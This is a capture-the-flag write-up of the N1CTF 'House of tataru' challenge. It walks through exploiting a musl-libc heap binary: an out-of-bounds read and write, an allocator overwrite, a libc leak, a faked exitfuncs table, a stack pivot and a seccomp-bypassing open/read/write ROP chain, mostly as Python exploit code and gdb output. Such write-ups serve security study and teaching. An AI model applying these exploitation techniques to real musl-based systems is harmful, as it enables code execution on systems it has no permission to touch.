House_of_tataru

Attachment: house_of_tataru.zip xpl.py

Team: Super Guesser

Tataru Taru wants to solo the boss,but she seems to have no way to do this alone, please help her!
1.Summon a pet to fight with tataru.
2.Order pet to leave the battlefield.
3.Order pet to parpre for attacking the boss.
4.Order pet to start attacking the boss.
5.Order pet to attack tataru.
The boss casts chaos and puts a lot of heap checks to the program!
:
Canary                        : ✓ (value: 0x99786e61501bce00)
NX                            : ✓ 
PIE                           : ✓ 
Fortify                       : ✘ 
RelRO                         : Full

Tataru was a heap challenge based on musl-libc, which gave me a hard time, since I had nearly no experience with musl-libc at all.

To be honest, even while doing this challenge, I avoided to really look into musl much, but solved this challenge in a more “ghetto way” instead by just analyzing everything in gdb, searching for good addresses and experimenting a lot.

So, let’s take a look at the different functionalities:

1.Summon a pet to fight with tataru.

case '1':
    read(0, &buf, 4);
    size = buf;

    read(0, &buf, 1);
    idx = (unsigned int)(char)buf;

    if ( (unsigned int)idx > 1 )
        exit(0);
        
    ENTRIES[idx].size = size;
    
    if ( size <= 0x1000 ) {
        // some weird heap sanity check
        chunk = &calloc + 0x114D8;
        do {
            if ( *chunk && *(*chunk + 1) != **chunk ) {
              write(1, "hacker!", 7);
              exit(0);
            }
            ++chunk;
        }
        while ( &calloc + 0x11508 != chunk );
        
        // create pet entry
        obj = &ENTRIES[idx];
        obj->buffer = calloc(1, size);
        obj->offset = 0;
        
        read_bytes = read(0, entry_buf, size);

        if ( read_bytes > 0 )
          obj->offset += read_bytes;
        else
            write(1, "failed", 6);
    }
    else
    {
        write(1, "no more magic", 0xD);
    }
    break;

For creating a pet, we first have to send 4 bytes, which will be the size for the spell to use (buffer) and then one byte, which will be the index, at which the pet will be stored.

struct Pet {
    char* buffer;
    unsigned long size;
    unsigned long offset;
}

It will then allocate a spell buffer for it and read our input into it. The length of our input will be stored in offset and the initial size in size.

And here’s already the main bug for this challenge: if we specify a size > 0x1000, it will store the size in the pet object, but then bail out of the function with the message no more magic without reallocating the object.

ENTRIES[idx].size = size;
    
if ( size <= 0x1000 ) {
...

We can use this to create an object with a smaller size (for example 0x30) and then call this function again with a size of 0x1200, which will result in a pet, which has a 0x30 buffer allocated, but a size of 0x1200. This will come in handy later on.

2.Order pet to leave the battlefield.

case '2':
    read(0, &buf, 1);
    idx = (unsigned int)(char)buf;

    if ( (unsigned int)idx > 1 )
        exit(0);

    write(1, "Tataru tripped your pet and you failed to order it!\n", 0x34);

    ENTRIES[idx_2].offset = ENTRIES[idx_2].size;

    break;

This will just set the offset of the object to size. This would normally prevent us to append more data to the buffer, since the append function will check, that offset is smaller than size.

But as we’ve already seen, we will be able to manipulate size for the pet afterwards again, so we can abuse this to set offset to an arbitrary value.

3.Order pet to parpre for attacking the boss.

case '3':
    read(0, &buf, 1);
    idx = (unsigned int)(char)buf;

    if ( (unsigned int)idx > 1 )
        exit(0);

    offset = ENTRIES[idx]->offset;
    stored_size = ENTRIES[idx]->size;

    if ( offset >= stored_size )
        continue;

    obj = &ENTRIES[idx];

    cur_pos = &obj->buffer[offset];

    // mean oob write check :(
    if ( cur_pos >= &calloc + 0xFFFFAB76 ) {
        write(1, "hacker!", 7);
        exit(0);
    }

    read_bytes = read(0, cur_pos, stored_size - offset);
    if ( read_bytes > 0 ) {
        obj->offset += read_bytes;
        continue;
    }

    write(1, "failed", 6);
    break;

This option lets us append data to our pets spell buffer (at the current offset).

if ( cur_pos >= &calloc + 0xFFFFAB76 ) {

That check will however verify, that the current buffer offset is not bigger than libc base address, so no easy leaks or overwrites will be possible.

This also results in some quirky behaviour of the challenge, since musl will allocate some chunks between libc and stack and the challenge will terminate, if you try to write to those chunks (though they aren’t corrupted or anything), which was kinda weird in the beginning.

It’s also important to note here, that read will not segfault, if it tries to read into an unmapped memory region. We would just get a "failed" response from the challenge in that case.

4.Order pet to start attacking the boss.

case '4':
    read(0, &buf, 1);
    idx = (unsigned int)(char)buf;

    if ( (unsigned int)idx > 1 )
        exit(0);

    obj = &ENTRIES[idx];

    if ( &obj->buffer[obj->offset] >= (char *)&calloc + 0xFFFD5BB0 ) {
        write(1, "hacker!", 7);
        exit(0);
    }

    write(1, "Tataru tripped your pet, your pet failed to use ", 0x30);

    buffer_offset = &obj->buffer[obj->offset];
    len_buffer = strlen(buffer_offset);
    
    write(1, buffer_offset, len_buffer);

    write(1, " to attack the boss\n", 0x14);
    break;

This is pretty much a leaking function. It will print out the string at buffer+offset. But again, this will also check, that the address is not bigger than base address of libc, which made it quite hard to get any useful leaks except heap addresses.

5.Order pet to attack tataru.

case '5':
    write(1, "You have defeated tataru, you have won!\n", 0x28);
    return 0;

This will just quit the application, which could be useful, if you’d manage to write a ropchain on the stack and return into it. But I didn’t find a way to leak a stack address, so didn’t use it all.

So, the main bug in this challenge is the fact, that we can change the size of an already allocated chunk without reallocating it.

With this we can simply overflow the spell buffer chunk. But combining this with option 2, which sets the offset to current size, we can even do an arbitrary “relative” oob write and read.

  • Allocate a chunk with size < 0x1000
  • Call option 1 again with size = relative offset to write to
  • Call option 2 to set offset to current size
  • Call option 1 again and set size to a bigger value
  • Can now write or read to it

Let’s start with a heap leak:

def summon(idx, size, data):
    r.send("1")
    
    r.send(p32(size))
    r.send(p8(idx))
    
    if len(data) == size:
        r.send(data)
    else:
        r.sendline(data)

    r.recvuntil(":")

def set_size(idx, size):
    r.send("1")
    r.send(p32(size))
    r.send(p8(idx))
    r.recvuntil(":")

def set_cursize(idx):
    r.send("2")
    r.send(p8(idx))
    r.recvuntil(":")

def prepare(idx, data, sendline=False):
    r.send("3")
    r.send(p8(idx))
    
    if sendline:
        r.sendline(data)
    else:
        r.send(data)
    return r.recvuntil(":")

def leak(idx):
    r.send("4")
    r.send(p8(idx))
    r.recvuntil("use ")
    LEAK = r.recvuntil(" to attack", drop=True)
    r.recvuntil(":")
    return LEAK

def exploit(r):
    r.recvuntil(":")

    # create some chunks in slot 1
    for i in range(5):
        summon(1, 0x40, "")

    # create another chunk in slot 0
    summon(0, 0x40, "")

    # overwrite size of slot 0
    set_size(0, 0x1010)

    # align slot 0 buffer with heap address on bss
    payload = "A"*(0x2e0-1)    
    prepare(0, payload)

    # read heap address from bss
    LEAK = u64(leak(0).ljust(8, "\x00"))
    HEAP = LEAK - 0xb8

    log.info("HEAP leak       : %s" % hex(LEAK))
    log.info("HEAP base       : %s" % hex(HEAP))

    r.interactive()
    
    return

musl tries to optimize memory usage and will also reuse unused memory from bss.

After allocating 5 chunks (which were served from a region behind libc), the 6th chunk was allocated on bss.

gef➤  x/30gx 0x0000555555558000
0x555555558000:	0x0000555555558000	0x0000000000000000
0x555555558010:	0x0000000000000000	0x0000000000000000
0x555555558020:	0x0000000000000000	0x0000000000000000
0x555555558030:	0x0000000000000000	0x0000000000000000
0x555555558040:	0x0000555555558cb0	0x0000000000001010 <- slot 0 buffer / size
0x555555558050:	0x00000000000002e0	0x00007ffff7ffede0 <- slot 0 offset / slot 1 buffer
0x555555558060:	0x0000000000000040	0x0000000000000001 <- slot 1 size / slot 1 offset
0x555555558070:	0x0000000000000000	0x0000000000000000
0x555555558080:	0x0000000000000000	0x0000000000000000

gef➤  x/30gx 0x0000555555558cb0+0x2e0
0x555555558f90:	0x000055555555a0b8	0x0000ff0000000000 <- musl heap address
0x555555558fa0:	0x0000000000000000	0x0000000000000000

By corrupting the size of the first pet, we can align it’s buffer to the heap address and leak it.

[*] HEAP leak       : 0x55555555a0b8
[*] HEAP base       : 0x55555555a000

Since options 2-5 all had those pesky libc checks, we couldn’t use those to get a buffer in or behind libc.

Only option 1 doesn’t check the buffer address before writing to it, so I was determined that the only way to get a write into libc was to exploit musls allocation to serve us a buffer inside libc.

But for corrupting anything in musls arenas, we would need to be able to calculate the offset from a chunk on bss to an address on the heap, where musls metadata was stored. For this, we’d need to get a leak for bss first…

Sounds easy, but getting this leak took me the most time.

I allocated chunks in different ways for hours, trying to find a situation, in which a libc or address from the challenge might be somewhere behind it, so we could read it via the oob read, but no luck…

At some point, I got desparate and thought: Ok, screw it, with ASLR active, heap and bss address will “only” differ by 2 bytes, maybe give bruteforcing a try…

But, well yeah…. Bruteforcing two bytes will take wayyyy too long remote (every try took 10 seconds, so it might have finished in a week or so).

But thinking about bruteforcing lead me to another idea. Remember, that the read in option 3 will not segfault when reading into an unmapped region? Yep, we can totally use this, to create a “heap offset finder” :)

def test_off(idx, off):
    set_size(idx, off)
    set_cursize(idx)
    set_size(idx, off+8)
    resp = prepare(idx, "", True)
    if "failed" in resp:
        r.recv(1)
        return False

    return True

def exploit(r):
    r.recvuntil(":")

    summon(0, 0x30, "")

    # Find a valid offset to start of heap
    HEAP_OFF = 0x1060+8

    while True:
        log.info("Test: %s" % hex(HEAP_OFF))
        found = test_off(0, HEAP_OFF)

        if found:
            break

        if not found:
            HEAP_OFF += 0x1000

    HEAP_OFF -= 0x8

    log.info("HEAP offset: %s" % hex(HEAP_OFF))
gef➤  vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x0000562f10f4a000 0x0000562f10f4b000 0x0000000000000000 r-- /home/kileak/ctf/n1ctf/tataru/pwn
0x0000562f10f4b000 0x0000562f10f4c000 0x0000000000001000 r-x /home/kileak/ctf/n1ctf/tataru/pwn
0x0000562f10f4c000 0x0000562f10f4d000 0x0000000000002000 r-- /home/kileak/ctf/n1ctf/tataru/pwn
0x0000562f10f4d000 0x0000562f10f4e000 0x0000000000002000 r-- /home/kileak/ctf/n1ctf/tataru/pwn
0x0000562f10f4e000 0x0000562f10f4f000 0x0000000000003000 rw- /home/kileak/ctf/n1ctf/tataru/pwn
0x0000562f128f7000 0x0000562f128f8000 0x0000000000000000 --- [heap]
0x0000562f128f8000 0x0000562f128f9000 0x0000000000000000 rw- [heap]

gef➤  x/30gx 0x0000562f10f4e000
0x562f10f4e000:	0x0000562f10f4e000	0x0000000000000000
0x562f10f4e010:	0x0000000000000000	0x0000000000000000
0x562f10f4e020:	0x0000000000000000	0x0000000000000000
0x562f10f4e030:	0x0000000000000000	0x0000000000000000
0x562f10f4e040:	0x0000562f10f4efa0	0x0000000000000030 <= buffer
0x562f10f4e050:	0x0000000000000001	0x0000000000000000
0x562f10f4e060:	0x0000000000000000	0x0000000000000000
0x562f10f4e070:	0x0000000000000000	0x0000000000000000

First we align the offset to the end of bss (0x0000562f10f4efa0 + 0x1060 = 0x562f10f50000).

Then we’ll just try to read from that offset. If it fails, we’ll add 0x1000 to the offset and try again, until the read succeeds. As soon as read doesn’t fail, we will have hit the start of heap and by this know the offset from the current buffer to heap.

The reason I added another 8 byte to the offset is, that we don’t want to write into the first qword on the heap, because there will be a canary, which musl uses to validate its arena regions. So, our first valid write will write to heap+0x8, which is totally fine.

As soon as we know the offset to the heap, we can calculate elf base with our previous heap leak.

BSS = HEAP + 0x8 - HEAP_OFF - 0xf90 - 0x18
ELF = BSS - 0x4000

log.info("BSS             : %s" % hex(BSS))
log.info("ELF             : %s" % hex(ELF))	
[*] Test: 0x15a6068
[*] Test: 0x15a7068
[*] Test: 0x15a8068
[*] Test: 0x15a9068
[*] HEAP offset: 0x15a9060
[*] HEAP leak       : 0x55a3c9ff50b8
[*] HEAP base       : 0x55a3c9ff5000
[*] BSS             : 0x55a3c8a4b000
[*] ELF             : 0x55a3c8a47000

Depending on ASLR, finding the offset can take a long time and I already feared, that this approach would be blocked by a timeout remote, but as it turned out, it worked totally fine (the dockerfile, that was released later, also showed, that the challenge had a 30 minute timeout).

So, armed with a heap and elf leak, we can now finally calculate the needed offset to overwrite stuff on the heap with our relative oob write.

Since I still didn’t want to dig deeper into musl, I went on with “dynamic analysis” >;)

I allocated some chunks (size 0x30) and checked where they got allocated. Then I restarted the exploit and paused it, before the chunk would get allocated and searched the heap for an address around the address, where the next chunk will be stored and then used the oob write to write another address to it before.

Doing this, I found, that the next arena would be created at the address stored at 0x55555555a118. So, let’s overwrite it with a pointer to bss.

# 0x55555555a118 => allocation of next arena
BUFFER = BSS + 0xcb0
OFFSET = (HEAP + 0x118) - BUFFER

# overwrite next free chunk address with pointer to bss	
set_size(0, OFFSET)
set_cursize(0)
set_size(0, OFFSET+8)

prepare(0, p64(BSS + 0x10))
gef➤  x/30gx 0x55555555a108
0x55555555a108:	0x000055555555a040	0x000055555555a040
0x55555555a118:	0x0000555555558010	0x0000000100000000 <= next arena allocation
0x55555555a128:	0x00000000000004c0	0x0000000000000000
0x55555555a138:	0x0000000000000000	0x00007ffff7ffec40
0x55555555a148:	0x0000000000000000	0x00000000000003c0

After this, the next allocated chunk would overlap our ENTRIES table, so we can write arbitrary pointers into it.

I pointed slot 0 to the entry table itself, and slot 1 to read.got.

# overwrite entries table to prepare libc leak	
payload = p64(BSS + 0x40- 0x30) + p64(0x1000)   # 0 -> point to entry table itself
payload += p64(0x0) + p64(ELF + 0x3fb0)         # 1 -> point to read got
payload += p64(0x100) + p64(0)

# next allocation will overwrite entry table
summon(0, 0x30, payload)

# read read.got from pet 1 buffer
LIBCLEAK = u64(leak(1).ljust(8, "\x00"))
LIBC = LIBCLEAK - 0x74f10

log.info("LIBC leak       : %s" % hex(LIBCLEAK))
log.info("LIBC            : %s" % hex(LIBC))
gef➤  x/30gx 0x0000555555558000
0x555555558000:	0x0000555555558000	0x0000000000000000
0x555555558010:	0x0000000000000000	0x0000c00000000000
0x555555558020:	0x000055555555a220	0x0000c00000000001
0x555555558030:	0x000055555555a1f8	0x0000a00000000006
0x555555558040:	0x0000555555558010	0x0000000000001000 <= slot 0 buffer / slot 0 size
0x555555558050:	0x0000000000000030	0x0000555555557fb0 <= slot 0 offset / slot 1 buffer (read.got)
0x555555558060:	0x0000000000000100	0x0000000000000000 <= slot 1 size / slot 0 offset
0x555555558070:	0x0000000000000000	0x000000000000000c
[*] Test: 0x1068
[*] HEAP offset: 0x1060
[*] HEAP leak       : 0x55555555a0b8
[*] HEAP base       : 0x55555555a000
[*] BSS             : 0x555555558000
[*] ELF             : 0x555555554000
[*] LIBC leak       : 0x7ffff7fbbf10
[*] LIBC            : 0x7ffff7f47000

Since the first pet buffer points to the entry table itself, we can use it to overwrite the entry table again.

# overwrite entries table
payload = p64(BSS + 0x100 -0x30) + p64(0x1000)  # 0 -> point to helper buffer
payload += p64(0x0) + p64(BSS + 0x40)           # 1 -> point to entry table
payload += p64(0x100) + p64(0)

# overwrite entry table
prepare(0, payload)

At this point, I prepared a “helper buffer” which can be accessed via slot 0. This will be needed later in the exploit. Will skip this for now, but we’ll get back to this.

Let’s first think about how we can achieve rip control. We don’t have a stack leak, and due to the checks in the binary, I’m not sure, if it’s even possible to get one, so we cannot put a ropchain on the stack and return to it.

I thought, musl might also be using some kind of exitfuncs, so I debugged through the code of exit and indeed it does. We can easily trigger exit by pointing a chunk to somewhere in or behind libc and access it (though it was bugging us the whole time, now it comes to our rescue).

 ---------------------------------------------------------------------------------------------
   0x7ffff7f666ad                  push   rbp
   0x7ffff7f666ae                  push   rbx
   0x7ffff7f666af                  call   0x7ffff7fb2480
 → 0x7ffff7f666b4                  mov    rdx, QWORD PTR [rip+0x9768d]        # 0x7ffff7ffdd48
   0x7ffff7f666bb                  test   rdx, rdx
   0x7ffff7f666be                  je     0x7ffff7f66760
   0x7ffff7f666c4                  mov    ecx, DWORD PTR [rip+0x9789a]        # 0x7ffff7ffdf64
   0x7ffff7f666ca                  lea    eax, [rcx-0x1]
   0x7ffff7f666cd                  mov    DWORD PTR [rip+0x97891], eax        # 0x7ffff7ffdf64

At 0x7ffff7f666b4 it will read the address of the exitfuncs table from 0x7ffff7ffdd48.

---------------------------------------------------------------------------------------------
   0x7ffff7f666b4                  mov    rdx, QWORD PTR [rip+0x9768d]        # 0x7ffff7ffdd48
   0x7ffff7f666bb                  test   rdx, rdx
   0x7ffff7f666be                  je     0x7ffff7f66760
 → 0x7ffff7f666c4                  mov    ecx, DWORD PTR [rip+0x9789a]        # 0x7ffff7ffdf64
   0x7ffff7f666ca                  lea    eax, [rcx-0x1]
   0x7ffff7f666cd                  mov    DWORD PTR [rip+0x97891], eax        # 0x7ffff7ffdf64
   0x7ffff7f666d3                  test   ecx, ecx
   0x7ffff7f666d5                  jle    0x7ffff7f6672e
   0x7ffff7f666d7                  nop    WORD PTR [rax+rax*1+0x0]

At 0x7ffff7f666c4 it will read the count of entries from 0x7ffff7ffdf64.

---------------------------------------------------------------------------------------------
   0x7ffff7f666e7                  nop    WORD PTR [rax+rax*1+0x0]
   0x7ffff7f666f0                  cdqe   
   0x7ffff7f666f2                  mov    rdi, rbx
 → 0x7ffff7f666f5                  mov    r12, QWORD PTR [rdx+rax*8+0x108]
   0x7ffff7f666fd                  mov    rbp, QWORD PTR [rdx+rax*8+0x8]
   0x7ffff7f66702                  call   0x7ffff7fb2570
   0x7ffff7f66707                  mov    rdi, r12
   0x7ffff7f6670a                  call   rbp
   0x7ffff7f6670c                  mov    rdi, rbx

If we set entry count to 1, rax will now be 0 and r12 will be read from [rdx+0x108] (which will be moved to rdi at 0x7ffff7f66707). We can use this to set the argument for the function that will be called.

At 0x7ffff7f666fd rbp will be set to [rdx+8] and will then be called.

So to get an arbitrary call, we need to

  • Write the address of a fake exitfunc table to 0x7ffff7ffdd48
  • Write 0x1 (for rcx) to 0x7ffff7ffdf64
  • Write the address of the gadget we want to call into our fake exitfunc table
  • Write the argument (rdi) for our gadget into fake exitunc table +0x108
# 0x55555555a050 has next free target address
BUFFER = BSS + 0x40
OFFSET = (HEAP + 0x50) - BUFFER

set_size(1, OFFSET)
set_cursize(1)
set_size(1, OFFSET+8)

# overwrite next free arena address to point near exitfuncs address
prepare(1, p64(LIBC + 0xb6d10 - 0x30))

payload = "A"*0x48
payload += p64(BSS+0x100-8)        # point to helper buffer

summon(0, 0x100, payload)

payload = "A"*(0x130-4-8)
payload += p32(0x1)                # count for exitfuncs (rcx)

summon(1, 0x130, payload)

This will point the exitfunc table address to our previously created helper buffer and the second allocation will overwrite 0x7ffff7ffdf64 with 0x1, setting rcx to the correct value.

So, we need now to go back to the allocation of our helper buffer and prepare our fake exitfunc table there.

# write fake exitfunc table to BSS + 0x100
prepare(0, p64(0xdeadbeef))       # rip

# overwrite entry table again
payload = p64(BSS + 0x200) + p64(0x1000)
payload += p64(0x0) + p64(BSS + 0x40)
payload += p64(0x100) + p64(0)

prepare(1, payload)

# write exitfunc argument to BSS + 0x200
payload = p64(0xcafebabe)         # rdi

Let’s check exit again.

0x00007ffff7f6670a in ?? () from /lib/ld-musl-x86_64.so.1
───────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x41414141        
$rbx   : 0x00007ffff7ffdf60  →  0x0000000041414141 ("AAAA"?)
$rcx   : 0x1               
$rdx   : 0x00005555555580f8  →  0x0000000000000000
$rsp   : 0x00007fffffffdaf0  →  0x0000555555556250  →  0xfffff170fffff1c0
$rbp   : 0xdeadbeef        
$rsi   : 0x0000555555556229  →  0x002172656b636168 ("hacker!"?)
$rdi   : 0xcafebabe        
$rip   : 0x00007ffff7f6670a  →   call rbp
$r8    : 0x0               
$r9    : 0x0               
$r10   : 0x0               
$r11   : 0x246             
$r12   : 0xcafebabe        
$r13   : 0x0000555555558040  →  0x00007ffff7ffdd00  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r14   : 0x0000555555558040  →  0x00007ffff7ffdd00  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r15   : 0x130             
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7f666fd                  mov    rbp, QWORD PTR [rdx+rax*8+0x8]
   0x7ffff7f66702                  call   0x7ffff7fb2570
   0x7ffff7f66707                  mov    rdi, r12
 → 0x7ffff7f6670a                  call   rbp
   0x7ffff7f6670c                  mov    rdi, rbx
   0x7ffff7f6670f                  call   0x7ffff7fb2480
   0x7ffff7f66714                  mov    edx, DWORD PTR [rip+0x9784a]        # 0x7ffff7ffdf64
   0x7ffff7f6671a                  lea    eax, [rdx-0x1]
   0x7ffff7f6671d                  test   edx, edx
───────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffdaf0│+0x0000: 0x0000555555556250  →  0xfffff170fffff1c0	 ← $rsp
0x00007fffffffdaf8│+0x0008: 0x0000000000000000
0x00007fffffffdb00│+0x0010: 0x0000555555556219  →  0x726f6d206f6e003a (":"?)
0x00007fffffffdb08│+0x0018: 0x00007ffff7f5c09c  →  <exit+12> call 0x7ffff7fbf5e0
0x00007fffffffdb10│+0x0020: 0x00007fffffffdb48  →  0x0000000000000100
0x00007fffffffdb18│+0x0028: 0x0000555555555517  →   imul r14, r14, 0x18
─────────────────────────────────────────────────────────────────────────── arguments (guessed) ────
*0xdeadbeef (
   $rdi = 0x00000000cafebabe,
   $rsi = 0x0000555555556229 → 0x002172656b636168 ("hacker!"?),
   $rdx = 0x00005555555580f8 → 0x0000000000000000
)
────────────────────────────────────────────────────────────────────────────────────────────────────

Perfect, we got rip control and even control the argument in rdi.

Could be finished already, but we won’t be able to call system("/bin/sh") or one_gadget since the challenge uses seccomp

"""
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x07 0xc000003e  if (A != ARCH_X86_64) goto 0009
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x04 0xffffffff  if (A != 0xffffffff) goto 0009
 0005: 0x15 0x03 0x00 0x0000003b  if (A == execve) goto 0009
 0006: 0x15 0x02 0x00 0x0000009d  if (A == prctl) goto 0009
 0007: 0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0009
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0009: 0x06 0x00 0x00 0x00000000  return KILL
"""

So, we will need to do a ropchain. Tried to find a gadget for pivotting the stack into some controlled area, and musl libc just contained a wonderful gadget to do this:

0x000000000007b1f5: mov rsp, qword ptr [rdi + 0x30]; jmp qword ptr [rdi + 0x38];

Since we control rdi, we can just put an address at rdi+0x30 pointing to one of our buffers and put a simple ret gadget at rdi+x038. Calling this, will then pivot the stack into our buffer and continue execution there.

# 0x000000000007b1f5: mov rsp, qword ptr [rdi + 0x30]; jmp qword ptr [rdi + 0x38];
STACKPIVOT = LIBC + 0x7b1f5
RET = LIBC + 0x47ed7

# write fake exitfunc table to BSS + 0x100
prepare(0, p64(STACKPIVOT))       # rip

# overwrite entry table again
payload = p64(BSS + 0x200) + p64(0x1000)
payload += p64(0x0) + p64(BSS + 0x40)
payload += p64(0x100) + p64(0)

prepare(1, payload)

# write exitfunc argument to BSS + 0x200	
payload = p64(BSS+0x210-0x30)     # rdi
payload += p64(0x0)
payload += p64(BSS+0x220)         # rsp
payload += p64(RET)
payload += p64(0xfacebabe)        # rip
Program received signal SIGSEGV, Segmentation fault.
0x00000000facebabe in ?? ()
───────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x41414141        
$rbx   : 0x00007ffff7ffdf60  →  0x0000000041414141 ("AAAA"?)
$rcx   : 0x1               
$rdx   : 0x00005555555580f8  →  0x0000000000000000
$rsp   : 0x0000555555558228  →  0x0000000000000000
$rbp   : 0x00007ffff7fc21f5  →  <longjmp+30> mov rsp, QWORD PTR [rdi+0x30]
$rsi   : 0x0000555555556229  →  0x002172656b636168 ("hacker!"?)
$rdi   : 0x00005555555581e0  →  0x0000000000000000
$rip   : 0xfacebabe        
$r8    : 0x0               
$r9    : 0x0               
$r10   : 0x0               
$r11   : 0x246             
$r12   : 0x00005555555581e0  →  0x0000000000000000
$r13   : 0x0000555555558040  →  0x00007ffff7ffdd00  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r14   : 0x0000555555558040  →  0x00007ffff7ffdd00  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r15   : 0x130             
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
[!] Cannot disassemble from $PC
───────────────────────────────────────────────────────────────────────────────────────── stack ────
0x0000555555558228│+0x0000: 0x0000000000000000	 ← $rsp
0x0000555555558230│+0x0008: 0x0000000000000000
0x0000555555558238│+0x0010: 0x0000000000000000
0x0000555555558240│+0x0018: 0x0000000000000000
0x0000555555558248│+0x0020: 0x0000000000000000
0x0000555555558250│+0x0028: 0x0000000000000000
[!] Cannot access memory at address 0xfacebabe
────────────────────────────────────────────────────────────────────────────────────────────────────

What a journey, but finally we’re ropping :)

So, all that’s left now, is to open/read/write the flag via our ropchain.

POPRAX = LIBC+ 0x0000000000016a96
POPRDI = LIBC+ 0x00000000000152a1
POPRSI = LIBC+ 0x000000000001dad9
POPRDX = LIBC+ 0x000000000002cdae
SYSCALL =LIBC + 0x00000000000238f0

# write exitfunc argument to BSS + 0x200		
payload = p64(BSS+0x210-0x30)   # rdi
payload += p64(0x0)
payload += p64(BSS+0x220)       # rsp
payload += p64(RET)

# open("./flag", 0, 0)
payload += p64(POPRAX)
payload += p64(2)
payload += p64(POPRDI)
payload += p64(BSS+0x200+0x200)
payload += p64(POPRSI)
payload += p64(0)
payload += p64(POPRDX)
payload += p64(0)
payload += p64(SYSCALL)

# read(3, BSS+0x400, 100)
payload += p64(POPRAX)
payload += p64(0)
payload += p64(POPRDI)
payload += p64(3)
payload += p64(POPRSI)
payload += p64(BSS+0x200+0x200)
payload += p64(POPRDX)
payload += p64(100)
payload += p64(SYSCALL)

# write(1, BSS+0x400, 100)
payload += p64(POPRAX)
payload += p64(1)
payload += p64(POPRDI)
payload += p64(1)
payload += p64(POPRSI)
payload += p64(BSS+0x200+0x200)
payload += p64(POPRDX)
payload += p64(100)
payload += p64(SYSCALL)

payload = payload.ljust(0x200, "\x00")
payload += "./flag\x00"

exit will now trigger the ropchain and print the flag.

Due to the offset finder, the exploit will take quite some time to execute remote, since depending on the random gap between bss and heap it will need 300-20000 requests to find the correct offset to the heap.

Since there were only challenge servers in China available, it would have taken hours to execute it, since the connection was extremely slow.

Thanks to the organizers here for setting up a challenge server in Hong Kong, after we pointed out the slow connection. Connecting to that one via an AWS instance, the exploit ran a lot smoother and finished in about 5 minutes.

[*] Test: 0x104b068
[*] Test: 0x104c068
[*] Test: 0x104d068
[*] Test: 0x104e068
[*] HEAP offset     : 0x104e060
[*] HEAP leak       : 0x5559e56c20b8
[*] HEAP base       : 0x5559e56c2000
[*] BSS             : 0x5559e4673000
[*] ELF             : 0x5559e466f000
[*] LIBC leak       : 0x7fa4e4e1df10
[*] LIBC            : 0x7fa4e4da9000
[*] Switching to interactive mode
hacker!n1ctf{U_Ar3_RE41LY_M43TeR_0f_Mus1!}
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$  
n1ctf{U_Ar3_RE41LY_M43TeR_0f_Mus1!}

Not so sure about that, but thanks ;-)